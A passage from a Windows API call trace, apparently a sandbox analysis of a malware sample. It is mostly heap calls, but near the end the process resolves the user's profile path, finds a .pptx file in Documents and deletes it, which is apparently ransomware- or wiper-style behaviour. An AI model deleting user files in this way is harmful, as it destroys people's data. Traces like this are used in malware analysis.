hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0262.453] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0262.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0262.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0262.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.453] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0262.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0262.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa908 [0262.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b70 [0262.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0262.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0262.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0262.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0262.454] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f90 [0262.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0262.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0262.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.455] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.455] CloseHandle (hObject=0x268) returned 1 [0262.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0262.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0262.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0262.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0262.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0262.461] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0262.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0262.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0262.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0262.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0262.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0262.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0262.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0262.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0262.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0262.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0262.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0262.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0262.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0262.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0262.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0262.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0262.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0262.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0262.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0262.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0262.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0262.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0262.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0262.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0262.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0262.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0262.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0262.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0262.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0262.464] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0262.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0262.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0262.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0262.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0262.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0262.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0262.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0262.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0262.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0262.465] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34ffb10 | out: hHeap=0x25c0000) returned 1 [0262.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0262.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0262.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0262.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0262.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0262.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0262.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0262.467] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0262.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0262.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0262.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0262.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0262.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0262.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0262.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0262.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.468] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0262.469] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0262.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0262.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0262.469] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0262.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0262.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0262.469] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0262.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0262.469] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0262.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0262.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0262.470] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0262.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0262.470] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0262.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0262.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0262.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0262.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0262.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0262.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.470] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0262.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0262.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0262.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0262.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0262.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0262.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0262.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0262.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0262.471] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0262.471] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24f2068 [0262.471] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/G0mzKIgpl5aj2M-.pptx", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G0mzKIgpl5aj2M-.pptx", lpFilePart=0x8bedfc*="G0mzKIgpl5aj2M-.pptx") returned 0x3c [0262.472] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f2068 | out: hHeap=0x25c0000) returned 1 [0262.472] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G0mzKIgpl5aj2M-.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g0mzkigpl5aj2m-.pptx")) returned 0x20 [0262.472] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G0mzKIgpl5aj2M-.pptx", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25439ff0, ftCreationTime.dwHighDateTime=0x1d49ccb, ftLastAccessTime.dwLowDateTime=0xcce10f20, ftLastAccessTime.dwHighDateTime=0x1d4b5fa, ftLastWriteTime.dwLowDateTime=0xcce10f20, ftLastWriteTime.dwHighDateTime=0x1d4b5fa, nFileSizeHigh=0x0, nFileSizeLow=0x13626, dwReserved0=0x1b7f, dwReserved1=0x4, cFileName="G0mzKIgpl5aj2M-.pptx", cAlternateFileName="G0MZKI~1.PPT")) returned 0xaa5760 [0262.472] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\G0mzKIgpl5aj2M-.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g0mzkigpl5aj2m-.pptx")) returned 1 [0262.474] FindNextFileW (in: hFindFile=0xaa5760, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25439ff0, ftCreationTime.dwHighDateTime=0x1d49ccb, ftLastAccessTime.dwLowDateTime=0xcce10f20, ftLastAccessTime.dwHighDateTime=0x1d4b5fa, ftLastWriteTime.dwLowDateTime=0xcce10f20, ftLastWriteTime.dwHighDateTime=0x1d4b5fa, nFileSizeHigh=0x0, nFileSizeLow=0x13626, dwReserved0=0x1b7f, dwReserved1=0x4, cFileName="G0mzKIgpl5aj2M-.pptx", cAlternateFileName="G0MZKI~1.PPT")) returned 0 [0262.474] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0262.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0262.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.474] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0262.474] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0262.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0262.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0262.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0262.474] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0262.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0262.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0262.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0262.475] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0262.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0262.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0262.475] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0262.475] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.475] RtlAllocateHeap (HeapHandle=0x25c0000, 